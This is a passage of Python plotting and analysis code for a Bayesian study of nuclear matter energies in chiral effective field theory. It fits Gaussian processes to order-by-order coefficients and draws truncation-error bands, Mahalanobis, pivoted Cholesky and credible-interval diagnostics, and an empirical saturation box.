        x_min_no_trunc, y_min_no_trunc = X.ravel()[min_idx], pred[min_idx]
        return x_min_no_trunc, y_min_no_trunc, x_min, y_min, pred, cov
def figure_name(self, prefix, breakdown=None, ls=None, max_idx=None, include_system=True):
body = self.body
fit_n2lo = self.fit_n2lo
fit_n3lo = self.fit_n3lo
Lambda = self.Lambda
ref = self.ref
if not include_system:
system = 'x'
else:
system = self.system_strings_short[self.system]
full_name = prefix + f'sys-{system}_{body}'
if body == 'NN+3N' or body == '3N':
full_name += f'_fit-{fit_n2lo}-{fit_n3lo}'
else:
full_name += f'_fit-0-0'
full_name += f'_Lamb-{Lambda:.0f}_Q-{self.ratio_str}'
if isinstance(breakdown, tuple):
full_name += f'_Lb-{breakdown[0]:.0f}-{breakdown[1]:.0f}-{breakdown[2]:.0f}'
elif breakdown is not None:
full_name += f'_Lb-{breakdown:.0f}'
else:
full_name += f'_Lb-x'
if isinstance(ls, tuple):
full_name += f'_ls-{ls[0]:.0f}-{ls[1]:.0f}-{ls[2]:.0f}'
elif ls is not None:
full_name += f'_ls-{ls:.0f}'
else:
full_name += f'_ls-x'
try:
full_name += f'_ref-{ref:.0f}'
except TypeError: # If it's a function
pass
if max_idx is not None:
full_name += f'_midx-{max_idx}'
else:
full_name += f'_midx-x'
center = str(self.kwargs.get('center', 0)).replace('.', 'p')
disp = str(self.kwargs.get('disp', 1)).replace('.', 'p')
df = str(self.kwargs.get('df', 1)).replace('.', 'p')
scale = str(self.kwargs.get('scale', 1)).replace('.', 'p')
full_name += f'_hyp-{center}-{disp}-{df}-{scale}'
full_name = join(self.fig_path, full_name)
return full_name
def model_info(self, breakdown=None, ls=None, max_idx=None):
    R"""Returns a dict of the model choices and hyperparameters that identify this analysis.

    Parameters
    ----------
    breakdown : float, optional
        The breakdown scale. Stored as NaN if not provided.
    ls : float, optional
        The kernel length scale. Stored as NaN if not provided.
    max_idx : int, optional
        The index of the highest order included. Stored as NaN if not provided.

    Returns
    -------
    dict
        Keys describe the system/body, fits, cutoff, reference scale, the
        GP hyperparameters, and the (possibly NaN) breakdown, length scale,
        and max order index.
    """
    # Use np.nan — the np.NaN alias was removed in NumPy 2.0 — so that
    # "unspecified" values remain valid floats in downstream DataFrames.
    if breakdown is None:
        breakdown = np.nan
    if ls is None:
        ls = np.nan
    if max_idx is None:
        max_idx = np.nan
    info = dict(
        body=self.body,
        fit_n2lo=self.fit_n2lo,
        fit_n3lo=self.fit_n3lo,
        Lambda=self.Lambda,
        ref=self.ref,
        center=self.kwargs.get('center', 0),
        disp=self.kwargs.get('disp', 1),
        df=self.kwargs.get('df', 1),
        scale=self.kwargs.get('scale', 1),
        breakdown=breakdown,
        ls=ls,
        max_idx=max_idx,
    )
    return info
def compute_y_label(self):
    R"""Returns the y-axis label for the current system, including its math symbol.

    Raises
    ------
    ValueError
        If `self.system` is not one of 'neutron', 'symmetric', 'difference'.
    """
    prefixes = {
        'neutron': 'Energy per Neutron ',
        'symmetric': 'Energy per Particle ',
        'difference': 'Symmetry Energy ',
    }
    if self.system not in prefixes:
        raise ValueError('system has wrong value')
    return prefixes[self.system] + fr'${self.system_math_strings[self.system]}$'
def setup_ticks(self, ax, is_density_primary, train, valid, show_2nd_axis=True, show_train_valid=True):
    R"""Configures axis labels and tick locations for a convergence plot.

    Parameters
    ----------
    ax : matplotlib.axes.Axes
        The axis to configure.
    is_density_primary : bool
        If True, the bottom axis is density and the (optional) twin axis is
        Fermi momentum; otherwise the roles are swapped.
    train, valid
        Index masks into the data; when `show_train_valid` is True, major
        ticks mark training points and minor ticks mark validation points.
    show_2nd_axis : bool, optional
        Whether to draw a twin x-axis labeled in the complementary variable.
    show_train_valid : bool, optional
        Whether ticks mark train/validation points instead of automatically
        chosen locations.

    Returns
    -------
    ax or (ax, ax2)
        The configured axis, plus the twin axis when `show_2nd_axis` is True.
    """
    d_label = r'Density $n$ [fm$^{-3}$]'
    kf_label = r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]'
    # ax.set_xticks(x_ticks)
    # ax2.set_xticks(x_ticks)
    x_min, x_max = ax.get_xlim()
    if is_density_primary:
        x_label = d_label
        x = self.density
        if show_train_valid:
            x_ticks = x[train]
        else:
            ax.xaxis.set_major_locator(MultipleLocator(0.1))
            ax.xaxis.set_minor_locator(AutoMinorLocator(2))
            # Keep only the auto-chosen ticks that fall inside the data limits
            x_ticks = ax.get_xticks()
            x_ticks = x_ticks[(x_ticks >= x_min) & (x_ticks <= x_max)]
        if show_2nd_axis:
            x_label2 = kf_label
            # Twin-axis tick labels show the momentum at each density tick
            x_ticks2 = self.compute_momentum(x_ticks)
        # ax.set_xlabel(d_label)
        # ax.set_xticks(x_ticks)
        # ax.set_xticks(self.density[valid], minor=True)
        #
        # ax2.plot(x_ticks, ax.get_yticks().mean() * np.ones_like(x_ticks), ls='')
        # ax2.set_xlabel(kf_label)
        # ax2.set_xticklabels(self.compute_momentum(x_ticks))
    else:
        x_label = kf_label
        x = self.X.ravel()
        if show_train_valid:
            x_ticks = x[train]
        else:
            ax.xaxis.set_major_locator(MultipleLocator(0.02))
            ax.xaxis.set_minor_locator(AutoMinorLocator(2))
            # Force a draw so the tick locations are actually computed
            plt.draw()
            x_ticks = ax.get_xticks()
            x_ticks = x_ticks[(x_ticks >= x_min) & (x_ticks <= x_max)]
        if show_2nd_axis:
            x_label2 = d_label
            x_ticks2 = self.compute_density(x_ticks)
        # ax.set_xlabel(kf_label)
        # x_ticks = self.X[train].ravel()
        # ax.set_xticks(x_ticks)
        # ax.set_xticks(self.X[valid].ravel(), minor=True)
        #
        # ax2.plot(x_ticks, ax.get_yticks().mean() * np.ones_like(x_ticks), ls='')
        # ax2.set_xlabel(d_label)
        # ax2.set_xticks(x_ticks)
        # ax2.set_xticklabels(self.compute_density(x_ticks))
    ax.set_xlabel(x_label)
    if show_train_valid:
        # Major ticks at training points, minor ticks at validation points
        ax.set_xticks(x_ticks)
        x_ticks_minor = x[valid]
        ax.set_xticks(x_ticks_minor, minor=True)
    else:
        x_ticks_minor = ax.get_xticks(minor=True)
    ax.tick_params(right=True)
    y_label = self.compute_y_label()
    ax.set_ylabel(y_label)
    if show_2nd_axis:
        ax2 = ax.twiny()
        ax2.margins(*ax.margins())  # Give them same margins, can't change ax.margins after this!
        # Plot invisible line to get ticks right
        ax2.plot([x_min, x_max], ax.get_yticks().mean() * np.ones(2), ls='')
        ax2.set_xlabel(x_label2)
        ax2.set_xticks(x_ticks)
        ax2.set_xticks(x_ticks_minor, minor=True)
        ax2.set_xticklabels([f'{tick:0.2f}' for tick in x_ticks2])
        return ax, ax2
    return ax
def compute_std_and_kernel(self, breakdown=None):
    R"""Fits a conjugate GP to the non-excluded coefficients.

    Parameters
    ----------
    breakdown : float, optional
        The breakdown scale; defaults to the MAP value `self.breakdown_map[-1]`.

    Returns
    -------
    tuple
        The marginal standard deviation sqrt(cbar_sq_mean_) and the fitted kernel.
    """
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    coeffs = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
    gp = gm.ConjugateGaussianProcess(**self.kwargs)
    gp.fit(self.X_train, coeffs[self.train])
    return np.sqrt(gp.cbar_sq_mean_), gp.kernel_
def plot_coefficients(self, breakdown=None, ax=None, show_process=False, savefig=None, return_info=False,
                      show_excluded=False, show_2nd_axis=True, kernel=None, show_train_valid=True, loc='best'):
    R"""Plots the observable coefficients c_n, optionally with the underlying GP bands.

    Parameters
    ----------
    breakdown : float, optional
        Breakdown scale used to extract the coefficients. If `None`, the MAP value is used.
    ax : matplotlib.axes.Axes, optional
        The axis on which to draw; a new figure is created if `None`.
    show_process : bool, optional
        If True, fit a ConjugateGaussianProcess and overlay its mean and 2-sigma bands.
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.
    show_excluded : bool, optional
        Whether to also plot coefficients for excluded orders.
    show_2nd_axis : bool, optional
        Whether to show a second x-axis in the complementary variable.
    kernel : optional
        A kernel to override the default GP kernel.
    show_train_valid : bool, optional
        Whether ticks mark the train/validation points.
    loc : str, optional
        Legend location.

    Returns
    -------
    ax, or (ax, info) when saving with `return_info=True`.
    """
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    if ax is None:
        fig, ax = plt.subplots(figsize=(3.4, 3.4))
    kf = self.X.ravel()
    density = self.density
    train = self.train
    if show_process:
        # Fit the GP to the non-excluded coefficients at the training points
        coeffs_not_excluded = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
        gp_kwargs = self.kwargs.copy()
        if kernel is not None:
            gp_kwargs['kernel'] = kernel
        model = gm.ConjugateGaussianProcess(**gp_kwargs)
        model.fit(self.X_train, coeffs_not_excluded[train])
        print(model.kernel_)
        print('cbar mean:', np.sqrt(model.cbar_sq_mean_))
        if show_excluded:
            # Predict with a model trained on *all* orders when showing excluded ones
            model_all = gm.ConjugateGaussianProcess(**gp_kwargs)
            coeffs_all = self.compute_coefficients(breakdown=breakdown, show_excluded=True)
            model_all.fit(self.X_train, coeffs_all[train])
            pred, std = model_all.predict(self.X, return_std=True)
        else:
            pred, std = model.predict(self.X, return_std=True)
        mu = model.center_
        cbar = np.sqrt(model.cbar_sq_mean_)
        # Reference lines: GP mean and +/- 2*cbar band edges
        ax.axhline(mu, 0, 1, lw=1, c='k', zorder=0)
        ax.axhline(2*cbar, 0, 1, c=gray, zorder=0)
        ax.axhline(-2*cbar, 0, 1, c=gray, zorder=0)
    coeffs = self.compute_coefficients(breakdown=breakdown, show_excluded=show_excluded)
    colors = self.colors
    orders = self.orders
    markers = self.markers
    markerfillstyles = self.markerfillstyles
    if not show_excluded:
        colors = self.colors_not_excluded
        orders = self.orders_not_excluded
        markers = self.markers_not_excluded
        markerfillstyles = self.markerfillstyles_not_excluded
    light_colors = [lighten_color(c, 0.5) for c in colors]
    is_density_primary = True
    if is_density_primary:
        x = density
    else:
        x = kf
    for i, n in enumerate(orders):
        z = i / 20
        label = fr'$c_{{{n}}}$'
        if self.n_bodies[i] is not None:
            # Annotate the label with the number of bodies (e.g. 2 vs 3 body forces)
            label = fr'$c_{{{n}}}^{{({self.n_bodies[i]})}}$'
        ax.plot(
            x, coeffs[:, i], c=colors[i], label=label, zorder=z,
            markevery=train, marker=markers[i], fillstyle=markerfillstyles[i])
        # ax.plot(x[train], coeffs[train, i], marker=markers[i], ls='', c=colors[i], zorder=z,
        #         fillstyle=markerfillstyles[i])
        if show_process:
            # ax.plot(x, pred[:, i], c=colors[i], zorder=z, ls='--')
            ax.fill_between(
                x, pred[:, i] + 2*std, pred[:, i] - 2*std, zorder=z,
                lw=0.5, alpha=1, facecolor=light_colors[i], edgecolor=colors[i]
            )
    # ax.axhline(0, 0, 1, ls='--', c=gray, zorder=-1)
    # ax2 = ax.twiny()
    # ax2.plot(d, np.zeros_like(d), ls='', c=gray, zorder=-1)  # Dummy data to set up ticks
    # ax2.set_xlabel(r'Density $n$ [fm$^{-3}$]')
    # y_label = self.compute_y_label()
    # ax.set_ylabel(y_label)
    # ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
    # ax.set_xticks(self.X_valid.ravel(), minor=True)
    if len(orders) > 4:
        ax.legend(ncol=3, loc=loc)
    else:
        ax.legend(ncol=2, loc=loc)
    ax.margins(x=0)
    self.setup_ticks(
        ax, is_density_primary, train=train, valid=self.valid, show_2nd_axis=show_2nd_axis,
        show_train_valid=show_train_valid
    )
    # Symmetrize the y limits about zero
    ylim = np.max(np.abs(ax.get_ylim()))
    ax.set_ylim(-ylim, ylim)
    if savefig is None:
        savefig = self.savefigs
    if savefig:
        fig = plt.gcf()
        name = self.figure_name('coeffs', breakdown=breakdown)
        fig.savefig(name)
        if return_info:
            info = self.model_info(breakdown=breakdown)
            name = path.relpath(name, self.fig_path)
            info['name'] = name
            return ax, info
    return ax
def plot_observables(self, breakdown=None, ax=None, show_process=False, savefig=None, return_info=False,
                     show_excluded=False, show_2nd_axis=True, panels=False):
    R"""Plots the order-by-order observable predictions, optionally with truncation bands.

    Parameters
    ----------
    breakdown : float, optional
        Breakdown scale for the truncation model. If `None`, the MAP value is used.
    ax : matplotlib.axes.Axes, optional
        The axis to draw on; a new figure is created if `None`.
    show_process : bool, optional
        If True, fit a TruncationGP and shade the truncation-error bands.
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.
    show_excluded : bool, optional
        Whether to plot orders that were excluded from the fit.
    show_2nd_axis : bool, optional
        Whether to show a second x-axis (single-panel mode only).
    panels : bool, optional
        If True, draw a 2x2 grid where panel j shows orders up to j.

    Returns
    -------
    ax, or (ax, info) when saving with `return_info=True`.
    """
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    if ax is None:
        if panels:
            fig, axes = plt.subplots(2, 2, figsize=(3.4, 3.4), sharex=True, sharey=True)
        else:
            fig, ax = plt.subplots(figsize=(3.4, 3.4))
            axes = np.atleast_2d(ax)
    else:
        axes = np.atleast_2d(ax)
    for ax in axes.ravel():
        ax.margins(x=0.)
    kf = self.X.ravel()
    is_density_primary = True
    if is_density_primary:
        x = self.density
    else:
        x = kf
    if show_process:
        model = gm.TruncationGP(
            ratio=self.ratio, ref=self.ref, excluded=self.excluded,
            ratio_kws=dict(breakdown=breakdown), **self.kwargs
        )
        model.fit(self.X_train, y=self.y_train, orders=self.orders)
    # Select the predictions matching the requested body type
    if self.body == 'NN-only':
        y = self.y2
    elif self.body == 'NN+3N':
        y = self.y3
    elif self.body == 'Appended':
        y = self.y3
    elif self.body == '3N':
        y = self.y3
    else:
        raise ValueError('body not in allowed values')
    # Loop through all orders and throw them out later if needed
    orders = self.orders_original
    colors = self.colors_original
    # if not show_excluded:
    #     # coeffs = coeffs[:, self.excluded_mask]
    #     colors = self.colors_original_not_excluded
    #     orders = self.orders_original_not_excluded
    light_colors = [lighten_color(c, 0.5) for c in colors]
    print(orders)
    for j in range(4):
        if panels:
            # Panel j shows successively more orders
            cycle_orders = orders[:j+1]
        else:
            cycle_orders = orders
        if j > 0 and not panels:
            break
        ax = axes.ravel()[j]
        order_labels = []
        for i, n in enumerate(cycle_orders):
            z = i / 20
            if n not in self.orders_not_excluded and not show_excluded:
                # Don't plot orders if we've excluded them
                continue
            # Map the internal order number to the chiral-order label
            order_label = n if n in [0, 1] else n - 1
            if order_label == 0:
                order_str = 'LO'
            elif order_label == 1:
                order_str = 'NLO'
            else:
                order_str = fr'N$^{order_label}$LO'
            order_labels.append(order_str)
            ax.plot(x, y[:, i], c=colors[i], label=order_str, zorder=z)
            # ax.plot(kf[train], self.y[train, i], marker='o', ls='', c=colors[i], zorder=z)
            if show_process:
                _, std = model.predict(self.X, order=n, return_std=True, kind='trunc')
                if self.body == 'Appended':
                    n_3bf = n if n >= 3 else 3  # 3-body forces don't enter until N3LO
                    _, std_3bf = model.predict(self.X, order=n_3bf, return_std=True, kind='trunc')
                    # ref3/ref2 may be callables or arrays; EAFP handles both
                    try:
                        ref3_vals = self.ref3(self.X)
                    except TypeError:
                        ref3_vals = self.ref3
                    try:
                        ref2_vals = self.ref2(self.X)
                    except TypeError:
                        ref2_vals = self.ref2
                    # For appended, the standard reference is the 2-body one. So swap for the 3-body ref
                    std_3bf *= ref3_vals / ref2_vals
                    # Combine the 2- and 3-body truncation errors in quadrature
                    std = np.sqrt(std**2 + std_3bf**2)
                # ax.plot(x, y[:, i], c=colors[i], zorder=z, ls='--')
                ax.fill_between(
                    x, y[:, i] + std, y[:, i] - std, zorder=z,
                    lw=0.5, alpha=1, facecolor=light_colors[i], edgecolor=colors[i]
                )
    # ax2.plot(d, self.y[:, 0], ls='', c=gray, zorder=-1)  # Dummy data to set up ticks
    # ax.axhline(0, 0, 1, ls='--', c=gray, zorder=-1)
    # if self.system == 'neutron':
    #     y_label = fr'Energy per Neutron '
    # elif self.system == 'symmetric':
    #     y_label = 'Energy per Particle '
    # elif self.system == 'difference':
    #     y_label = 'Symmetry Energy '
    # else:
    #     raise ValueError('system has wrong value')
    #
    # y_label += fr'${self.system_math_strings[self.system]}$'
    # y_label = self.compute_y_label()
    # ax.set_ylabel(y_label)
    # ax.set_xlabel(r'Fermi Momentum $k_\mathrm{F}$ [fm$^{-1}$]')
    # ax.set_xticks(self.X_valid.ravel(), minor=True)
    # if self.system == 'neutron':
    #     kf_ticks = np.array([1.2, 1.4, 1.6, 1.8])
    # elif self.system == 'symmetric':
    #     kf_ticks = np.array([1., 1.2, 1.4])
    # else:
    #     kf_ticks = np.array([1., 1.2, 1.4])
    # ax.set_xticks(kf_ticks)
    for ax in axes.ravel():
        ax.xaxis.set_major_locator(MultipleLocator(0.2))
        # ax2 = ax.twiny()
        # ax2.margins(x=0.)
        ax.set_xlim(x[0], x[-1])
        if self.system == 'symmetric':
            # Overlay the empirical saturation box for symmetric matter
            self.plot_empirical_saturation(ax, is_density_primary=is_density_primary)
    if panels:
        # both_axes = self.setup_ticks(
        #     ax, is_density_primary, train=self.train, valid=self.valid, show_2nd_axis=False)
        for ax in axes.ravel():
            if is_density_primary:
                ax.xaxis.set_major_locator(MultipleLocator(0.1))
            else:
                ax.xaxis.set_major_locator(MultipleLocator(0.2))
            ax.xaxis.set_minor_locator(AutoMinorLocator(2))
            ax.yaxis.set_minor_locator(AutoMinorLocator(2))
            ax.tick_params(right=True, top=True, which='both')
        d_label = r'Density $n$ [fm$^{-3}$]'
        axes[1, 0].set_xlabel(d_label)
        axes[1, 1].set_xlabel(d_label)
        from .graphs import add_top_order_legend
        fig = plt.gcf()
        dark_colors = [darken_color(color) for color in colors]
        add_top_order_legend(fig, axes[0, 0], axes[0, 1], order_labels, colors, light_colors, dark_colors)
    else:
        ax.legend()
        both_axes = self.setup_ticks(
            ax, is_density_primary, train=self.train, valid=self.valid, show_2nd_axis=show_2nd_axis)
        if show_2nd_axis:
            both_axes[-1].set_xlim(x[0], x[-1])
    if savefig is None:
        savefig = self.savefigs
    if savefig:
        fig = plt.gcf()
        name = self.figure_name('obs_', breakdown=breakdown)
        fig.savefig(name)
        if return_info:
            info = self.model_info(breakdown=breakdown)
            info['name'] = path.relpath(name, self.fig_path)
            return ax, info
    return ax
def plot_joint_breakdown_ls(self, max_idx, return_info=False):
    R"""Plots the 2D joint posterior of the breakdown scale and length scale.

    Parameters
    ----------
    max_idx : int
        The index of the highest order included in the posterior.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.

    Returns
    -------
    fig, or (fig, info) when saving with `return_info=True`.
    """
    system_str = fr'${self.system_math_string}$'
    order_str = fr'N$^{max_idx}$LO'
    fig = joint2dplot(self.df_ls, self.df_breakdown, self.df_joint, system=system_str,
                      order=order_str, data_str=self.system_math_string)
    # (min, max, num) tuples encode the grids scanned for the file name
    breakdown = (self.breakdown_min, self.breakdown_max, self.breakdown_num)
    ls = (self.ls_min, self.ls_max, self.ls_num)
    if self.savefigs:
        name = self.figure_name('ls-Lb-2d_', breakdown=breakdown, ls=ls, max_idx=max_idx)
        fig.savefig(name)
        if return_info:
            info = self.model_info(max_idx=max_idx)
            info['name'] = path.relpath(name, self.fig_path)
            return fig, info
    return fig
def plot_md_squared(
        self, breakdown=None, ax=None, savefig=None, return_info=False, interp=False, kernel=None,
        show_excluded=False
):
    R"""Plots the squared Mahalanobis distance.

    Parameters
    ----------
    breakdown : float, optional
        The value for the breakdown scale to use in the diagnostics. If `None`, then its MAP value is used.
    ax : matplotlib.axes.Axes, optional
        The axis on which to draw the coefficient plots and diagnostics
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.
    interp : bool, optional
        Passed through to the underlying graphical diagnostic.
    kernel : optional
        A kernel to override the default GP kernel.
    show_excluded : bool, optional
        Whether excluded orders enter the diagnostic.

    Returns
    -------
    ax : matplotlib.axes.Axes
        The axis object
    """
    if ax is None:
        fig, ax = plt.subplots(figsize=(1, 3.2))
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    graph = self.compute_underlying_graphical_diagnostic(
        breakdown=breakdown, interp=interp, kernel=kernel, show_excluded=show_excluded)
    obs = self.system_math_string
    ax.yaxis.set_major_locator(MaxNLocator(integer=True))
    ax.margins(y=0)
    ax = graph.md_squared(type='box', trim=False, title=None, xlabel=rf'${self.MD_label}({obs})$', ax=ax)
    # Hide the single x tick label (white text, zero-width ticks)
    ax.set_xticks([0])
    ax.set_xticklabels(['0'], fontdict=dict(color='w'))
    ax.tick_params(width=0, axis='x')
    # plt.xticklabels()
    ymin, ymax = ax.get_ylim()
    # Clamp the lower limit at zero; MD^2 is non-negative
    ax.set_ylim(np.max([np.floor(ymin), 0]), np.ceil(ymax))
    if savefig is None:
        savefig = self.savefigs
    if savefig:
        fig = plt.gcf()
        name = self.figure_name('md_under_', breakdown=breakdown)
        fig.savefig(name)
        if return_info:
            info = self.model_info(breakdown=breakdown)
            info['name'] = path.relpath(name, self.fig_path)
            return ax, info
    return ax
def plot_pchol(
        self, breakdown=None, ax=None, savefig=None, return_info=False, interp=False, kernel=None,
        show_excluded=False
):
    R"""Plots the pivoted Cholesky diagnostic.

    Parameters
    ----------
    breakdown : float, optional
        The value for the breakdown scale to use in the diagnostic. If `None`, then its MAP value is used.
    ax : matplotlib.axes.Axes, optional
        The axis on which to draw the coefficient plots and diagnostics
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.
    interp : bool, optional
        Passed through to the underlying graphical diagnostic.
    kernel : optional
        A kernel to override the default GP kernel.
    show_excluded : bool, optional
        Whether excluded orders enter the diagnostic.

    Returns
    -------
    ax : matplotlib.axes.Axes
        The axis object
    """
    if ax is None:
        fig, ax = plt.subplots(figsize=(3.2, 3.2))
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    graph = self.compute_underlying_graphical_diagnostic(
        breakdown=breakdown, interp=interp, kernel=kernel, show_excluded=show_excluded
    )
    obs = self.system_math_string
    # LaTeX rendering is needed for the legend label below
    with plt.rc_context({"text.usetex": True, "text.latex.preview": True}):
        ax = graph.pivoted_cholesky_errors(ax=ax, title=None)
        # ax = graph.individual_errors(ax=ax, title=None)
        # ax.text(0.5, 0.95, rf'${self.PC_label}({obs})$', bbox=text_bbox, transform=ax.transAxes, va='top',
        #         ha='center')
        # Hijack a legend to get the 'best' location to place the text
        line, = ax.plot([])
        # Remove the handle from the legend box.
        ax.legend(
            [line], [rf'${self.PC_label}({obs})$'], handlelength=0,
            loc='best', handletextpad=0)
        fig = plt.gcf()
        if savefig is None:
            savefig = self.savefigs
        if savefig:
            name = self.figure_name('pc_under_', breakdown=breakdown)
            fig.savefig(name)
            if return_info:
                info = self.model_info(breakdown=breakdown)
                info['name'] = path.relpath(name, self.fig_path)
                return ax, info
    return ax
def plot_coeff_diagnostics(
        self, breakdown=None, fig=None, savefig=None, return_info=False,
        interp=False, kernel=None, show_excluded=False):
    R"""Plots coefficients, the squared Mahalanobis distance, and the pivoted Cholesky diagnostic.

    Parameters
    ----------
    breakdown : float, optional
        The value for the breakdown scale to use in the diagnostics. If `None`, then its MAP value is used.
    fig : matplotlib.figure.Figure, optional
        The Figure on which to draw the coefficient plots and diagnostics
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    return_info : bool, optional
        If True (and saving), also return a dict describing the model/figure.
    interp : bool, optional
        Passed through to the diagnostics.
    kernel : optional
        A kernel to override the default GP kernel.
    show_excluded : bool, optional
        Whether excluded orders enter the plots.

    Returns
    -------
    fig : matplotlib.figure.Figure
        The figure object
    """
    if fig is None:
        fig = plt.figure(figsize=(7, 3.2), constrained_layout=True)
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    # Layout: coefficients (3/7 width), MD^2 (1/7), pivoted Cholesky (3/7)
    spec = fig.add_gridspec(nrows=1, ncols=7)
    ax_cs = fig.add_subplot(spec[:, :3])
    ax_md = fig.add_subplot(spec[:, 3])
    ax_pc = fig.add_subplot(spec[:, 4:])
    show_2nd_axis = self.system != self.system_strings['difference']
    self.plot_coefficients(
        breakdown=breakdown, ax=ax_cs, show_process=True, savefig=False, show_2nd_axis=show_2nd_axis,
        kernel=kernel, show_excluded=show_excluded,
    )
    self.plot_md_squared(
        breakdown=breakdown, ax=ax_md, savefig=False, interp=interp, kernel=kernel,
        show_excluded=show_excluded,
    )
    self.plot_pchol(
        breakdown=breakdown, ax=ax_pc, savefig=False, interp=interp, kernel=kernel,
        show_excluded=show_excluded,
    )
    if savefig is None:
        savefig = self.savefigs
    if savefig:
        name = self.figure_name('cn_diags_', breakdown=breakdown)
        # fig.savefig(name, metadata={'hi': [1, 2, 3], 'wtf': 7})
        fig.savefig(name)
        if return_info:
            info = self.model_info(breakdown=breakdown)
            info['name'] = path.relpath(name, self.fig_path)
            return fig, info
    return fig
def plot_credible_diagnostic(
        self, breakdown=None, ax=None, savefig=None, truncation=False, show_excluded=False, all_points=False,
        show_legend=True, ylabel=r'Empirical Coverage [$\%$]',
):
    R"""Plots the credible-interval (weather-plot) diagnostic.

    Parameters
    ----------
    breakdown : float, optional
        The breakdown scale. If `None`, its MAP value is used.
    ax : matplotlib.axes.Axes, optional
        The axis to draw on; a new figure is created if `None`.
    savefig : bool, optional
        Whether to save the figure. If `None`, this is taken from `self.savefigs`.
    truncation : bool, optional
        If True, diagnose the truncation-error model via between-order
        residuals; otherwise use the underlying coefficient diagnostic.
    show_excluded : bool, optional
        Whether excluded orders enter the diagnostic.
    all_points : bool, optional
        If True use all points; otherwise only validation points.
    show_legend : bool, optional
        Whether to draw the order legend (truncation mode only).
    ylabel : str, optional
        The y-axis label.

    Returns
    -------
    fig : matplotlib.figure.Figure
    """
    if ax is None:
        fig, ax = plt.subplots(figsize=(3.2, 3.2))
    if breakdown is None:
        breakdown = self.breakdown_map[-1]
        print('Using breakdown =', breakdown, 'MeV')
    if truncation:
        model = gm.TruncationGP(
            ratio=self.ratio, ref=self.ref, excluded=self.excluded,
            ratio_kws=dict(breakdown=breakdown), **self.kwargs
        )
        model.fit(self.X_train, y=self.y_train, orders=self.orders)
        if all_points:
            X = self.X
            y = self.y
        else:
            X = self.X_valid
            y = self.y_valid
        if show_excluded:
            orders = self.orders
            colors = self.colors
        else:
            y = y[:, self.excluded_mask]
            orders = self.orders_not_excluded
            colors = self.colors_not_excluded
        # Get the covariance without any Q junk
        # norm_trunc_cov = model.cov(X, start=0, end=0)
        ref = model.ref(X)
        norm_trunc_cov = ref[:, None] * ref * model.coeffs_process.cov(X=X)
        # Get the between-order residuals
        residuals = np.diff(y)
        Q = self.ratio(X)
        # Normalize them based on the approximate size of the next order correction
        # This is so that we can use the same Q-less covariance for each correction
        norm_residuals = residuals / Q[:, None] ** orders[1:]
        graph = gm.GraphicalDiagnostic(
            norm_residuals, mean=np.zeros(X.shape[0]),
            cov=norm_trunc_cov, colors=colors, gray=gray, black=softblack
        )
    else:
        graph = self.compute_underlying_graphical_diagnostic(breakdown=breakdown, show_excluded=show_excluded)
    obs = self.system_math_string
    intervals = np.linspace(1e-5, 1, 100)
    band_perc = [0.68, 0.95]
    if show_excluded:
        linestyles = self.linestyles
    else:
        linestyles = self.linestyles_not_excluded
    ax = graph.credible_interval(
        intervals=intervals, band_perc=band_perc,
        # title=rf'${self.CI_label}({obs})$',
        title=None,
        ax=ax,
        xlabel=r'Credible Interval [$\%$]', ylabel=ylabel,
        linestyles=linestyles
    )
    # Convert fractional ticks to percentages on both axes
    ax.set_xticks([0, 0.2, 0.4, 0.6, 0.8, 1])
    ax.set_xticklabels([0, 20, 40, 60, 80, 100])
    ax.set_yticks([0, 0.2, 0.4, 0.6, 0.8, 1])
    ax.set_yticklabels([0, 20, 40, 60, 80, 100])
    if truncation and show_legend:
        handles, labels = ax.get_legend_handles_labels()
        ax.set_title('')
        ax.legend(handles=handles, labels=[r'LO', r'NLO', r'N$^{2}$LO'], title=rf'${self.CI_label}({obs})$')
    fig = plt.gcf()
    if savefig is None:
        savefig = self.savefigs
    if savefig:
        name = self.figure_name(f'ci_diag_trunc-{truncation}_', breakdown=breakdown)
        fig.savefig(name)
    return fig
def plot_empirical_saturation(self, ax=None, is_density_primary=True):
    R"""Draws the empirical saturation box (density vs. energy per particle) on `ax`.

    The saturation point and its uncertainties are taken from
    Drischler 2018, arXiv:1710.08220 (errors added linearly).
    """
    from matplotlib.patches import Rectangle
    n0, n0_std = 0.164, 0.007    # saturation density and its uncertainty
    y0, y0_std = -15.86, 0.57    # saturation energy; errors added linearly
    lo = n0 - n0_std
    hi = n0 + n0_std
    if not is_density_primary:
        # Convert the density band edges to Fermi momenta
        lo = self.compute_momentum(lo)
        hi = self.compute_momentum(hi)
    box = Rectangle(
        (lo, y0 - y0_std), width=hi - lo, height=2 * y0_std,
        facecolor='lightgray', edgecolor='gray', alpha=0.4, zorder=9,
    )
    ax.add_patch(box)
    return ax
def plot_saturation(self, breakdown=None, order=4, ax=None, savefig=None, color=None, nugget=0, X=None,
                    cond=None, n_samples=1000, is_density_primary=True, **kwargs):
    R"""Plots the predicted saturation point with a 2-sigma confidence ellipse.

    Parameters
    ----------
    breakdown : float, optional
        The breakdown scale. If `None`, its MAP value is used.
    order : int, optional
        The order whose prediction is minimized.
    ax : matplotlib.axes.Axes, optional
